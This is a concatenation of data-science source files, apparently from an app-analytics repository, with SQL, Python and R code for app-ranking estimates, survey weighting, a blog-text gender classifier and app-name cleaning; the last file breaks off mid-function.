ios_ratio_units.plot(ax=axes[1, 0], title="Actuals")
ios_ratio_count = ios_ratio_us.pivot(index="end_period", columns="weekday", values="count")
ios_ratio_count.plot(ax=axes[1, 1], title="Num of Apps")
# ios_ratio_us.plot(title="%s_%s" % (stores_dict[store_id], unit), figsize=(10, 8))
pylab.savefig("figs/%s_raw/%s_%s.png" % (platform, stores_dict[store_id], unit))
<file_sep>/int-vs-m-benchmark/sql/android/1001g1-compute_weekly_average.sql
/*
Compute the weekly averages.
*/
DROP TEMPORARY TABLE IF EXISTS temp.weekly_rank_averages;
CREATE TEMPORARY TABLE temp.weekly_rank_averages(
date date NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
category_id smallint(5) unsigned NOT NULL,
`rank` SMALLINT(5) UNSIGNED NOT NULL,
average decimal(8,2) NOT NULL)
select
max(r.date) as date,
r.country_id,
r.type,
r.category_id,
r.rank,
avg(d.real_value) as average,
count(*) as n_sample
from
temp.rankings r
join temp.application_data d
using (date, country_id, type, application_id)
where
d.real_value is not null
and d.price_changed = 0
group by
r.country_id,
r.type,
r.category_id,
r.rank
;
<file_sep>/aa_au_model/correction/constants.py
__author__ = 'hgriffioen'
DATA_VERSION = 'v3.4.8'
DATA_FOLDER = 'data/'
ISO_CODE = 'US'
SAMPLE_BUCKET_PATH = '/s3mnt-projecta/aardvark-prod-pdx-ds-sample/'
#MDM_BUCKET_PATH = '/s3mnt-projecta/aa-monitor-prod-pdx-to-int-data/'
MDM_BUCKET_PATH = '/s3mnt-projecta/aardvark-prod-pdx-mdm-to-int/'
<file_sep>/weekly_weights/model_compare_v4.py
##
# KPI_analysis_ios_nonnuniv version 3
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: Simulate the SBE solution on the data set sent to Kaggle
##
import pandas as pd
#import os
#import config
#import operator
import math
import csv
import statsmodels.api as sm
import numpy as np
#from rpy import *
import matplotlib.pyplot as plt
import config
feed_type_format = {0: 'Free',
1: 'Paid',
2: 'Grossing',
101: 'Free',
100: 'Paid',
102: 'Grossing',
}
feed_market_format = {0: 'iPhone',
1: 'iPhone',
2: 'iPhone',
101: 'iPad',
100: 'iPad',
102: 'iPad',
}
result = None
gres = []
def fun(x, a):
return a * x
def plot_actuals(df):
########### Plor actuals VS Estimates ################
for n,g in df.groupby(['Country', 'Market', 'Type']):
fig = plt.figure()
ax = fig.add_subplot(111)
p2, = ax.plot(g['estimate_final'], g['estimate_preview'], 'b.', alpha=0.4, label='estimate_preview')
p1, = ax.plot(g['estimate_final'], g['estimate_final'], 'r-', label='estimate_final')
ax.legend(loc='best', prop={'size':10})
title = 'difference_%s'%str(n)
plt.title(title)
plt.xlabel('estimate_final')
plt.ylabel('estimate_preview')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('plots/difference/%s.png'%title)
def preprocess_metadata(df):
df['Country'] = df['store_id'].apply(lambda x: config.IOS_STORES_DICT[x])
df['Type'] = df['feed_id'].apply(lambda x: feed_type_format[x])
df['Market'] = df['feed_id'].apply(lambda x: feed_market_format[x])
return df
def get_stats(df):
result = []
ranges = [[1,20],
[21,200],
[201,10000]
]
for n,g in df.groupby(['Country', 'Market', 'Type', 'date']):
g = g.sort(['estimate_final'], ascending=False)
for range in ranges:
t = g[range[0]:range[1]].mean()
top = pd.DataFrame(columns=t.index.values)
top = top.append(t, ignore_index=True)
top['range'] = str(range)
top['Country'] = n[0]
top['Market'] = n[1]
top['Type'] = n[2]
top['Date'] = n[3]
result.append(top)
result = pd.concat(result)
del result['date']
result.to_csv('data/preview_vs_final.csv', index=False)
return result
def main():
global result
global gres
metadata_f = '/Users/perezrafael/appannie/data/preview_final/daily_estimates_preview/daily_estimates_ios.csv'
df_preview = pd.read_csv(metadata_f)
metadata_f = '/Users/perezrafael/appannie/data/preview_final/daily_estimates_final/daily_estimates_ios_final.csv'
df_final = pd.read_csv(metadata_f)
g_merge = pd.merge(df_preview, df_final, on = ['store_id', 'feed_id', 'date', 'app_id'], how = 'inner', suffixes=('_preview', '_final'))
#g_merge = g_merge.dropna()
g_merge = preprocess_metadata(g_merge)
g_merge['gap'] = (g_merge['estimate_preview'] - g_merge['estimate_final']) *1.0
g_merge['gap_abs'] = g_merge['gap'].abs()
g_merge['gap_perc'] = g_merge['gap_abs']*1.0 / g_merge['estimate_preview']
get_stats(g_merge)
print g_merge['date'].min(), g_merge['date'].max()
plot_actuals(g_merge)
if __name__ == '__main__':
main()<file_sep>/google-analytics/r_codes/t-score.R
tscore = function(t1_mean, t2_mean, t1_var, t2_var, n1, n2)
{
return ((t1_mean - t2_mean) / sqrt(t1_var / n1 + t2_var / n2))
}
compare_score = function(t1, t2, s1, s2, n1, n2)
{
ts = tscore(t1, t2, s1, s2, n1, n2)
print(ts)
print(2*pnorm(-abs(ts)))
df = (s1/n1 + s2/n2 )^2 / ( (s1/n1)^2 / (n1-1) + (s2/n2)^2 / (n2-1) )
print(df)
print(2 * pt(-abs(ts), df = df))
}
# Medium size
t1 = 360.9874
t2 = 307.3790514
s1 = 212096.5753
s2 = 254456.5094
n1 = 25
n2 = 2667
compare_score(t1, t2, s1, s2, n1, n2)
# Very small sample size
t1 = 54.6033
t2 = 124.9380
s1 = 445.6876
s2 = 38427.058
n1 = 3
n2 = 264
compare_score(t1, t2, s1, s2, n1, n2)
<file_sep>/int-vs-m-benchmark/sql/android/1001d1-prepare_application_data-join_transactional.sql
/*
FUNCTIONAL DESCRIPTION : Check whether transactional data apps are ranked in the selected period
INPUT TABLE(S) : temp.rankings,
temp.transactional_data
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) : temp.application_data
QUERY STEPS :
*/
-- RETREIVING APPLICATION DATA FROM RANKINGS --
/*
The index contains also the application_id (in the Apple App store algorithm this is not the case)
because multiple applications can have the same rank for a given (country_id, type, category_id)
due to collection of ranking data using multiple devices.
*/
DROP TEMPORARY TABLE IF EXISTS temp.application_data;
CREATE TEMPORARY TABLE temp.application_data(
date DATE NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
application_id int(10) unsigned NOT NULL,
price_usd decimal(9,2) DEFAULT NULL,
price_changed bool NULL,
real_value decimal(9,2) DEFAULT NULL,
preinstalled_value decimal(9,2) DEFAULT NULL,
estimate decimal(9,2) DEFAULT NULL,
estimate_source VARCHAR(50) DEFAULT NULL,
estimate_category_id smallint(5) unsigned DEFAULT NULL,
estimate_rank smallint(5) unsigned DEFAULT NULL,
estimate_extrapolated TINYINT unsigned DEFAULT NULL,
n smallint(5) unsigned DEFAULT NULL,
rsquare decimal(5,4) DEFAULT NULL,
fit_order TINYINT unsigned DEFAULT NULL,
stdev decimal(5,4) DEFAULT NULL,
df TINYINT unsigned DEFAULT NULL,
CONSTRAINT PRIMARY KEY (
date,
country_id,
type,
application_id),
INDEX category_index (
application_id,
type,
country_id)
)
SELECT
r.date,
r.country_id,
r.type,
r.application_id,
r.price_usd,
NULL AS price_changed,
t.value AS real_value,
null AS preinstalled_value,
null AS estimate,
null AS estimate_source,
null AS estimate_category_id,
null AS estimate_rank,
null AS estimate_extrapolated,
null AS n,
null AS rsquare,
null AS fit_order,
null AS stdev,
null AS df
FROM temp.rankings r
LEFT JOIN temp.transactional_data t
ON t.country_id = r.country_id
AND t.date = r.date
AND t.type = r.type
AND t.application_id = r.application_id
group by r.date, r.country_id, r.type, application_id
;
/*
Check to see if price has changed over the given dare range
Use this to update temp.application_data
*/
DROP TEMPORARY TABLE IF EXISTS temp.application_data_price_changes;
CREATE TEMPORARY TABLE temp.application_data_price_changes
(CONSTRAINT PRIMARY KEY (application_id,type,country_id))
as
SELECT
application_id,
type,
country_id,
IF(MAX(t.price_usd) <> MIN(t.price_usd),1,0) AS price_changed
FROM
temp.application_data t
group by
country_id,
type,
application_id
;
UPDATE temp.application_data a
JOIN temp.application_data_price_changes p ON a.application_id = p.application_id AND a.country_id = p.country_id
SET a.price_changed = p.price_changed
;
<file_sep>/audience/legacy_experiments/model_ipv1.py
##
# model python version 2
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: model for review demographic
#
#
##
import re
from nltk import NaiveBayesClassifier
import nltk.classify
from nltk.tokenize import wordpunct_tokenize
from nltk.corpus import stopwords
from collections import defaultdict
import pandas as pd
import os
from unidecode import unidecode
#import statsmodels.formula.api as sm
#import statsmodels.regression.linear_model as sm
#import statsmodels.api as sm
#from sklearn.svm import SVR
#import numpy as np
#import datetime as dt
def get_male_probability(text, ex_word_set, classifier):
features = gen_features(text, ex_word_set)
return classifier.prob_classify(features)
def gen_features(text, ex_word_set):
clean_text = text.encode('utf-8')
#print clean_text
#clean_text = unidecode(text.decode('utf-8', errors='ignore'))
clean_text = re.sub('3D', '', clean_text)
clean_text = re.sub('<(.|\n)*?>', '', clean_text)
clean_text = re.sub('&\w+;', '', clean_text)
clean_text = clean_text.replace('\n', '').lower()
tokens = wordpunct_tokenize(clean_text)
#tokens = tokens.apply(lambda x: [w for w in x if re.search('[a-zA-Z]', w) and len(w) > 1])
tokens = set(tokens)
tokens = tokens.difference(ex_word_set)
features = defaultdict(list)
for t in tokens:
features[t] = True
return features
def main():
global ver
global result_dir
ver = 'v1'
data_dir = '/Users/perezrafael/appannie/data/demie'
#data_dir = '/home/antony/data/benchmark_ios'
output_dir = 'output_%s'%ver
if not os.path.exists(output_dir):
os.makedirs(output_dir)
metadata_path = '%s/blog-gender-dataset.xlsx'%(data_dir)
xlsxfile = pd.ExcelFile(metadata_path)
df_obs = xlsxfile.parse('data', index_col = None)
sw = stopwords.words('english')
sw.extend(['ll', 've'])
df_obs = df_obs.dropna()
df_obs = df_obs.drop_duplicates()
#df_obs = df_obs.applymap(str)
df_obs['gender'] = df_obs['gender'].apply(lambda x: x.strip().upper())
#df_obs['pos_tag'] = df_obs['blog_text'].apply(lambda x: nltk.pos_tag(x))
features_labels = []
for row in df_obs.iterrows():
features = gen_features(row[1]['blog_text'], sw)
features_labels.append((features, row[1]['gender']))
#print features_labels
gender_classifier = NaiveBayesClassifier.train(features_labels)
#gender_classifier.show_most_informative_features(10)
test_text = 'do you know how to make dinner? sure! Fabulous!'
print test_text
result = get_male_probability(test_text, sw, gender_classifier)
print 'Male Probability = ' + str(round(result.prob('M'),3))
print 'Female Probability = ' + str(round(result.prob('F'),3))
print '======== Done'
pass
if __name__ == '__main__':
main()<file_sep>/financial-product-benchmark/automated-QA/procedures.py
__author__ = 'srhmtonk'
import matplotlib.pyplot as plt
import datetime
import seaborn as sns
sns.set(font="serif")
from itertools import product
def plot_curves(store, country, end_date, device_feed, data, min_rank=1, max_rank=1000, ax=None, scale='log'):
sel = (data.store == store)&(data.country == country)&\
(data.end_date == end_date)&(data.device_feed == device_feed)&\
(data['rank']>=min_rank)&(data['rank']<=max_rank)
if ax is None:
f,ax = plt.subplots()
ax.plot(data[sel]['rank'],data[sel].value_cla,'b-',label='classic')
ax.plot(data[sel]['rank'],data[sel].value_fin,'g-',label='financial')
ax.legend()
ax.set_xscale(scale)
ax.set_yscale(scale)
ax.set_xlim(min_rank,max_rank)
ax.set_title(store+' - '+country+' - '+end_date+' - '+device_feed)
ax.set_xlabel('rank')
ax.set_ylabel('estimate')
f.set_size_inches(8,4)
return ax
def plot_time_serie_app(store, country, device_feed, app_id, data, ax=None, scale='linear'):
sel = (data.store == store)&(data.country == country)&\
(data.app_id == app_id)&(data.device_feed == device_feed)
if ax is None:
f,ax = plt.subplots()
ax.plot(data[sel].end_date.apply(lambda x: datetime.datetime.strptime(x, "%Y-%m-%d").date()),
data[sel].value_cla,'b-o',label='classic')
ax.plot(data[sel].end_date.apply(lambda x: datetime.datetime.strptime(x, "%Y-%m-%d").date()),
data[sel].value_fin,'g-o',label='financial')
ax.legend()
ax.set_yscale(scale)
ax.set_title(store+' - '+country+' - '+device_feed+' - app_id '+str(app_id))
ax.set_xlabel('end_date')
ax.set_ylabel('estimate')
f.set_size_inches(8,4)
return ax
def plot_time_serie_rank(store, country, device_feed, rank, data, ax=None, scale='linear'):
sel = (data.store == store)&(data.country == country)&\
(data['rank'] == rank)&(data.device_feed == device_feed)
if ax is None:
f,ax = plt.subplots()
ax.plot(data[sel].end_date.apply(lambda x: datetime.datetime.strptime(x, "%Y-%m-%d").date()),
data[sel].value_cla,'b-o',label='classic')
ax.plot(data[sel].end_date.apply(lambda x: datetime.datetime.strptime(x, "%Y-%m-%d").date()),
data[sel].value_fin,'g-o',label='financial')
ax.legend()
ax.set_yscale(scale)
ax.set_title(store+' - '+country+' - '+device_feed+' - rank#'+str(rank))
ax.set_xlabel('end_date')
ax.set_ylabel('estimate')
f.set_size_inches(8,4)
return ax
def bucket_diff(data, country, store, max_rank=200):
sel = (data.store == store)&(data.country == country)
feeds = ['revenue','free','paid']
devices = ['ipad','iphone']
ax_rows,ax_cols = 2,3
f,axes = plt.subplots(ax_rows,ax_cols)
ax_ix = 0
for device,feed in product(devices,feeds):
ax_i_row,ax_i_col = ax_ix/ax_cols,ax_ix%ax_cols
axs = axes[ax_i_row,ax_i_col]
sel = (data.device_feed=='%s_%s'%(device,feed))&(data['rank']<=max_rank)
sel_df = data[sel][['bucket','rel_diff']]
sns.boxplot(sel_df.rel_diff,sel_df.bucket,order=sel_df.bucket.unique(), ax=axs)
plot_title = device+' - '+feed
axs.set_title(plot_title)
axs.set_ylim(-0.5,0.5)
if ax_i_row+1<ax_rows:
axs.set_xlabel('')
if ax_i_col>0:
axs.set_ylabel('')
ax_ix+=1
f.set_size_inches(17,10)
f.suptitle('%s - %s - relative difference'%(store,country), fontsize=18, y = 1.04)
f.tight_layout()
<file_sep>/evaluation/py/merge_est_and_real.py
import os
import sys
import os.path
from collections import defaultdict
import pandas as pd
import numpy as np
def main():
print(sys.argv)
est_dir = sys.argv[1]
real_dir = sys.argv[2]
output_dir = sys.argv[3]
input_files = _listdir_with_fullpath(est_dir) + _listdir_with_fullpath(real_dir)
input_files = filter(lambda s: s.endswith('.csv'), input_files)
g = _group_est_and_real(input_files)
for (group_name, files) in g:
# They have to be pair.
if len(files) != 2:
continue
df = _merge_est_and_real(map(pd.read_csv, files))
df.to_csv(os.path.join(output_dir, group_name), index=False)
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
def _group_est_and_real(paths):
# Corresponding est and real values should have the same base name.
# Despite that they're in different dirs.
d = defaultdict(list)
for s in paths:
d[os.path.basename(s)].append(s)
return d.iteritems()
def _merge_est_and_real(dfs):
# @note: Use inner join, because we only care the case where we have
# estimation and real values.
merged = pd.merge(*dfs, on=['app_id', 'date'], how='inner')
return merged.sort_index(by=['date'])
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/audience/audience/weight.py
import pandas as pd
SURVEY_PATH = '../data/survey_population_distribution_Q1_2015.csv'
def load_survey(platform, iso_code, device_type, modality='age_gender', mapping={}, survey_path=SURVEY_PATH):
"""
Load survey distribution for a given modality.
:param platform: Platform
:param iso_code: Survey country iso code
:param device_type: 'smartphone' or 'tablet'
:param modality: 'age', 'gender' or if crossed 'age_gender'
:param mapping: Mapping for modality if needed
:param survey_path: Path of survey to load
:returns DataFrame with survey stats
"""
survey = pd.read_csv(survey_path)
valid = survey[(survey.country.str.lower() == iso_code.lower()) &
(survey.platform.str.lower() == platform.lower()) &
(survey.device_type.str.lower() == device_type.lower())].copy()
valid.rename(columns={'population_counts': 'survey', 'age_bin': 'age'}, inplace=True)
for i in mapping.keys():
if mapping[i]:
valid[i] = valid[i].map(lambda x: mapping[i][x] if x in mapping[i] else x)
if modality == 'age_gender':
valid[modality] = valid['age'] + '_' + valid['gender']
valid.drop(['age', 'gender'], axis=1, inplace=True)
return valid[['country', 'platform', 'device_type', modality, 'survey']]
def compute_weighted_values(df, survey, var_cols, df_col, survey_col):
"""
Compute values after weight adjustment.
:param df: DataFrame with observations
:param survey: DataFrame with survey counts
:param var_cols: Variable columns in df and survey to compute the
distribution over
:param df_col: Column in df containing counts
:param survey_col: Column in survey containing counts
:return Series with weighted values of df_col per variable
"""
weights = compute_weights(df, survey, var_cols, df_col, survey_col)
combined = df.join(weights, on=var_cols)
combined['weighted_' + df_col] = combined['weight'] * combined[df_col]
diff = abs(combined['weighted_' + df_col].sum() - combined[df_col].sum())
assert diff < 1E-6, 'Incorrect weighting'
return combined['weighted_' + df_col]
def compute_weights(df, survey, var_cols, df_col, survey_col):
"""
Compute weights.
:param df: DataFrame with observations
:param survey: DataFrame with survey counts
:param var_cols: Variable columns in df and survey to compute the
distribution over
:param df_col: Column in df containing counts
:param survey_col: Column in survey containing counts
:return Series with weights per variable
"""
sample = compute_distribution(df, var_cols, df_col)
target = compute_distribution(survey, var_cols, survey_col)
weights = (target * 1. / sample)
weights.name = 'weight'
return weights
def compute_distribution(df, var_cols, cnt_col):
"""
Compute distribution over variables.
:param df: DataFrame
:param var_cols: List with variable columns
:param cnt_col: Column to compute the distribution over:
:return DataFrame with var_cols as index and distribution in cnt_col
"""
dist = df.groupby(var_cols)[cnt_col].sum() / df[cnt_col].sum()
return dist
<file_sep>/int-vs-m-benchmark/sql/ios/1000g1-compute_weekly_average.sql
/*
Compute the weekly averages.
*/
DROP TEMPORARY TABLE IF EXISTS temp.weekly_rank_averages;
CREATE TEMPORARY TABLE temp.weekly_rank_averages(
date date NOT NULL,
device_id TINYINT unsigned NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
category_id smallint(5) unsigned NOT NULL,
`rank` SMALLINT(5) UNSIGNED NOT NULL,
average decimal(8,2) NOT NULL,
constraint primary key(
country_id,
device_id,
type,
category_id,
rank))
select
max(r.date) as date,
r.device_id,
r.country_id,
r.type,
r.category_id,
r.rank,
avg(d.real_value) as average,
count(*) as n_sample
from
temp.rankings r
join temp.application_data d
using (date, device_id, country_id, type, application_id)
where
d.real_value is not null
and d.universal_app = 0
and d.price_changed = 0
group by
r.device_id,
r.country_id,
r.type,
r.category_id,
r.rank
;
<file_sep>/evaluation/py/internal/stores_dict.py
ios = {
'feed_to_unit': {'0': 'Downloads', '1': 'Downloads', '100': 'Downloads',
'101': 'Downloads', '2': 'USD', '102': 'USD'},
'unit_to_feeds': {'Downloads': [0, 1, 100, 101],
'USD': [2, 102]},
'categories': [36] + range(6000, 6019) + range(6020, 6024) + range(7001, 7020),
'market_type': {'Market':['iPhone', 'iPhone', 'iPhone', 'iPad', 'iPad', 'iPad'],
'Type':['Free', 'Paid', 'Grossing', 'Free', 'Paid', 'Grossing'],
'feed_id':[0, 1, 2, 101, 100, 102]},
'category_dict': {36: u'Overall',
6000: u'Business',
6001: u'Weather',
6002: u'Utilities',
6003: u'Travel',
6004: u'Sports',
6005: u'Social Networking',
6006: u'Reference',
6007: u'Productivity',
6008: u'Photo and Video',
6009: u'News',
6010: u'Navigation',
6011: u'Music',
6012: u'Lifestyle',
6013: u'Health and Fitness',
6014: u'Games',
6015: u'Finance',
6016: u'Entertainment',
6017: u'Education',
6018: u'Books',
6020: u'Medical',
6021: u'Newsstand',
6022: u'Catalogs',
6023: u'Food and Drink',
7001: u'Action',
7002: u'Adventure',
7003: u'Arcade',
7004: u'Board',
7005: u'Card',
7006: u'Casino',
7007: u'Dice',
7008: u'Educational',
7009: u'Family',
7010: u'Kids',
7011: u'Music',
7012: u'Puzzle',
7013: u'Racing',
7014: u'Role Playing',
7015: u'Simulation',
7016: u'Sports',
7017: u'Strategy',
7018: u'Trivia',
7019: u'Word'},
'country_dict': {143441: u'United States', 143442: u'France', 143443: u'Germany',
143444: u'United Kingdom', 143445: u'Austria', 143446: u'Belgium',
143447: u'Finland', 143448: u'Greece', 143449: u'Ireland',
143450: u'Italy', 143451: u'Luxembourg', 143452: u'Netherlands',
143453: u'Portugal', 143454: u'Spain', 143455: u'Canada',
143456: u'Sweden', 143457: u'Norway', 143458: u'Denmark',
143459: u'Switzerland', 143460: u'Australia', 143461: u'New Zealand',
143462: u'Japan', 143463: u'Hong Kong', 143464: u'Singapore',
143465: u'China', 143466: u'South Korea', 143467: u'India',
143468: u'Mexico', 143469: u'Russia', 143470: u'Taiwan',
143471: u'Vietnam', 143472: u'South Africa', 143473: u'Malaysia',
143474: u'Philippines', 143475: u'Thailand', 143476: u'Indonesia',
143477: u'Pakistan', 143478: u'Poland', 143479: u'Saudi Arabia',
143480: u'Turkey', 143481: u'United Arab Emirates', 143482: u'Hungary',
143483: u'Chile', 143485: u'Panama', 143486: u'Sri Lanka',
143487: u'Romania', 143489: u'Czech Republic', 143491: u'Israel',
143493: u'Kuwait', 143494: u'Croatia', 143495: u'Costa Rica',
143496: u'Slovakia', 143497: u'Lebanon', 143498: u'Qatar',
143499: u'Slovenia', 143501: u'Colombia', 143502: u'Venezuela',
143503: u'Brazil', 143504: u'Guatemala', 143505: u'Argentina',
143506: u'El Salvador', 143507: u'Peru', 143508: u'Dominican Republic',
143509: u'Ecuador', 143510: u'Honduras', 143511: u'Jamaica',
143512: u'Nicaragua', 143513: u'Paraguay', 143514: u'Uruguay',
143515: u'Macau', 143516: u'Egypt', 143517: u'Kazakhstan',
143518: u'Estonia', 143519: u'Latvia', 143520: u'Lithuania',
143521: u'Malta', 143523: u'Moldova', 143524: u'Armenia',
143525: u'Botswana', 143526: u'Bulgaria', 143528: u'Jordan',
143529: u'Kenya', 143530: u'Macedonia', 143531: u'Madagascar',
143532: u'Mali', 143533: u'Mauritius', 143534: u'Niger',
143535: u'Senegal', 143536: u'Tunisia', 143537: u'Uganda',
143538: u'Anguilla', 143539: u'Bahamas', 143540: u'Antigua and Barbuda',
143541: u'Barbados', 143542: u'Bermuda', 143543: u'British Virgin Islands',
143544: u'Cayman Islands', 143545: u'Dominica', 143546: u'Grenada',
143547: u'Montserrat', 143548: u'St. Kitts and Nevis', 143549: u'St. Lucia',
143550: u'St. Vincent and The Grenadines', 143551: u'Trinidad and Tobago', 143552: u'Turks and Caicos',
143553: u'Guyana', 143554: u'Suriname', 143555: u'Belize',
143556: u'Bolivia', 143557: u'Cyprus', 143558: u'Iceland',
143559: u'Bahrain', 143560: u'Brunei', 143561: u'Nigeria',
143562: u'Oman', 143563: u'Algeria', 143564: u'Angola',
143565: u'Belarus', 143566: u'Uzbekistan', 143568: u'Azerbaijan',
143571: u'Yemen', 143572: u'Tanzania', 143573: u'Ghana',
143575: u'Albania', 143576: u'Benin', 143577: u'Bhutan',
143578: u'Burkina Faso', 143579: u'Cambodia', 143580: u'Cape Verde',
143581: u'Chad', 143582: u'Congo', 143583: u'Fiji',
143584: u'Gambia', 143585: u'Guinea-Bissau', 143586: u'Kyrgyzstan',
143587: u'Laos', 143588: u'Liberia', 143589: u'Malawi',
143590: u'Mauritania', 143591: u'Micronesia', 143592: u'Mongolia',
143593: u'Mozambique', 143594: u'Namibia', 143484: u'Nepal',
143595: u'Palau', 143597: u'Papua New Guinea', 143598: u'Sao Tome and Principe',
143599: u'Seychelles', 143600: u'Sierra Leone', 143601: u'Solomon Islands',
143602: u'Swaziland', 143603: u'Tajikistan', 143604: u'Turkmenistan',
143492: u'Ukraine', 143605: u'Zimbabwe'}
}
android = {
'unit_to_feeds': {'Downloads': [0, 1],
'USD': [2] },
'categories': range(1, 38),
'feed_to_unit': {'0': 'Downloads', '1': 'Downloads', '2': 'USD'},
'country_dict': {
1: u'Australia',
2: u'Canada',
3: u'China',
4: u'Germany',
5: u'Spain',
6: u'France',
7: u'United Kingdom',
8: u'Italy',
9: u'Japan',
10: u'United States',
11: u'Belgium',
12: u'Switzerland',
13: u'Chile',
14: u'South Africa',
15: u'Vietnam',
16: u'Hong Kong',
17: u'Argentina',
18: u'Brazil',
19: u'India',
20: u'Finland',
21: u'Indonesia',
22: u'Russia',
23: u'Netherlands',
24: u'Malaysia',
25: u'Turkey',
26: u'Mexico',
27: u'South Korea',
28: u'Poland',
29: u'Thailand',
30: u'Taiwan',
31: u'Philippines',
32: u'Singapore',
33: u'Egypt',
34: u'Sweden',
35: u'Austria'
}
}
<file_sep>/exact-matching-improvement/lib/features_aa.py
# -*- coding: utf-8 -*-
import re
import temp_database
DNAExcludedTermsType = {'ADDRESS':(1, 'address'),
'APP_NAME': (2, 'app_name'),
'COMPANY_SUFFIX':(3, 'company_suffix'),
'COUNTRY_ABBR': (4, 'country_abbr'),
'COUNTRY_DOMAIN':(5, 'country_domain'),
'GLOBAL_DOMAIN': (6, 'global_domain'),
'PREFIX_WORD':(7, 'prefix_word'),
'PREP': (8, 'prep'),
'WEBHOST_DOMAIN': (9, 'webhost_domain')}
class Cleaner():
def __init__(self):
self.app_name_filter_list = [' iPhone',' Android',' iPad',' Pad','ipod','ipod touch',' free','Ad','Ads',
'Ad-free','ads-free','HD','FreePlay','premium','PLUS','Plus\\+','Deluxe','Pro',
'Professional','Platinum','Lite','version','edition','for kids',
'for private groups','for_kids','for_private groups','Free\\+','\\+\\+','AR',
'Full free','RPG','MMORPG','XL','Elite','BAND','Official App','mobile','digital',
'epaper','e-paper','replica','magazine','per','online','for kakao','graalonline',
'Abby Monkey','Free Music Downloader','Metronome','tinder box','Appstar',
'Splash Math','Vocabulary Trainer','Human','Revista']
self.prefix_words = ['a', 'an', 'the', 'de', 'il', 'le', 'les']
self.generate_regular_express()
def generate_regular_express(self):
self.app_clean_content_filter_RE = re.compile('\+\+|' + '|'.join([r'\b%s\b' % c for c in self.app_name_filter_list]), re.I)
self.app_clean_content_dash_RE = re.compile(r'(\-|_|\bby) .*')
self.app_clean_content_brackets_RE = re.compile(r'\([^\)]+\)|\[[^\]]+\]')
self.app_clean_suffix_last_char_RE = re.compile(r'([^\w\+\!]+)$')
self.app_clean_suffix_last_word_RE = re.compile(r'(\bfor\b|\bfull\b)$', flags=re.I)
self.app_illegal_chars_RE = re.compile(r'(^\w|\:|\+|\-|\!|\.|&|,|_])')
self.english_words_RE = re.compile(r'[^\x00-\x7f]')
self.app_clean_prefix_RE = re.compile('^(' + '|'.join([r'\b%s\b' % c for c in self.prefix_words]) + ')', re.I)
self.app_clean_content_trademark_RE = re.compile(r'[\xc2\xa9|\xe2\x84\xa2|\xc2\xae]+')
def clean_app_name(self, app_name):
"""
Clean app name.
Return cleaned app name.
"""
try:
app_name = app_name.encode('utf-8')
except:
pass
app_name = self.replace_app_specail_chinese_character(app_name)
app_name = self.app_clean_content_trademark_RE.sub(' ', app_name)
if not self.is_english(app_name):
return None
org_appname = app_name
if app_name:
app_name = self.clean_app_illegal_chars(app_name)
if app_name:
app_name = self.clean_app_prefix_words(app_name)
if app_name:
app_name = self.clean_app_content_words(app_name)
if app_name:
app_name = self.clean_app_suffix_words(app_name)
if app_name:
app_name = self.clean_app_name_space(app_name)
if app_name and len(app_name) > 1:
return app_name
return org_appname
def replace_app_specail_chinese_character(self, app_name):
"""
Replace app special Chinese character.
Return cleaned app name.
"""
index = app_name.find("–")
if index > -1:
regex = re.compile(ur"[\u2013]")
app_name = regex.sub('-', app_name.decode('utf-8')).encode('utf-8')
index = app_name.find("’")
if index > -1:
regex = re.compile(ur"[\u2019]")
app_name = regex.sub('\'', app_name.decode('utf-8')).encode('utf-8')
index = app_name.find("【")
if index > -1:
regex = re.compile(ur"[\u3010]")
app_name = regex.sub('[', app_name.decode('utf-8')).encode('utf-8')
index = app_name.find("】")
if index > -1:
regex = re.compile(ur"[\u3011]")
app_name = regex.sub(']', app_name.decode('utf-8')).encode('utf-8')
return app_name
def clean_app_illegal_chars(self, app_name):
"""
Clean app illegal chars.
Return cleaned app name.
"""
return self.clean_app_name_space(self.app_illegal_chars_RE.sub(' ', app_name))
def clean_app_prefix_words(self, app_name):
"""
Clean app name prefix words.
Return cleaned app name.
"""
return self.clean_app_name_space(self.app_clean_prefix_RE.sub(' ', app_name))
def clean_app_content_words(self, app_name):
"""
Clean app name content words.
Return cleaned app name.
"""
app_name = self.app_clean_content_dash_RE.sub(' ', app_name)
app_name = self.app_clean_content_brackets_RE.sub(' ', app_name)
app_name = self.app_clean_content_filter_RE.sub(' ', app_name)
return self.clean_app_name_space(app_name)
def clean_app_suffix_words(self, app_name):
"""
Clean app name suffix words.
Return cleaned app name.
"""
app_name = self.app_clean_suffix_last_char_RE.sub(' ', app_name)
app_name = self.app_clean_suffix_last_word_RE.sub(' ', app_name)
return self.clean_app_name_space(app_name)
def clean_app_name_space(self, app_name):
"""
Clean app name space.
Return cleaned app name.
"""
app_name = ' '.join(app_name.split())
app_name = app_name.strip()
return app_name
def is_english(self, s):
"""
Check if the string is English.
Return true|false.
"""
return not re.search(self.english_words_RE, s)<file_sep>/evaluation/py/get_estimate_info.py
# Author: <NAME> <<EMAIL>>
import os
import sys
import pandas as pd
import numpy as np
from joblib import Parallel, delayed
# This step is time-consuming and we parallelize
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
Parallel(n_jobs=4)(delayed(_run)(f, input_dir, output_dir)
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)))
def _run(f, input_dir, output_dir):
full_path = os.path.join(input_dir, f)
df = pd.read_csv(full_path)
apps_median_rank = _get_median_rank(df)
estimate_sd = _get_estimate_sd(df)
merged_info = apps_median_rank.merge(estimate_sd, how='outer', on=['app_id'])
merged_info.to_csv(os.path.join(output_dir, f), index=False)
# apps_median.to_csv(os.path.join(output_dir, f), index=False)
def _get_median_rank(df):
grouped = df.groupby(['app_id', 'category_id', 'feed_id'])['rank'].median()
agg = grouped.reset_index()
agg['median_rank'] = map(str, agg['rank'])
agg = agg.drop(['category_id', 'feed_id'], axis=1)
median_ranks = agg.groupby('app_id').aggregate({'median_rank': lambda x: ','.join(x)})
return median_ranks.reset_index()
def _get_estimate_sd(df):
def calculate_sd(x):
# Filter values == 1
if x.shape[0] == 1:
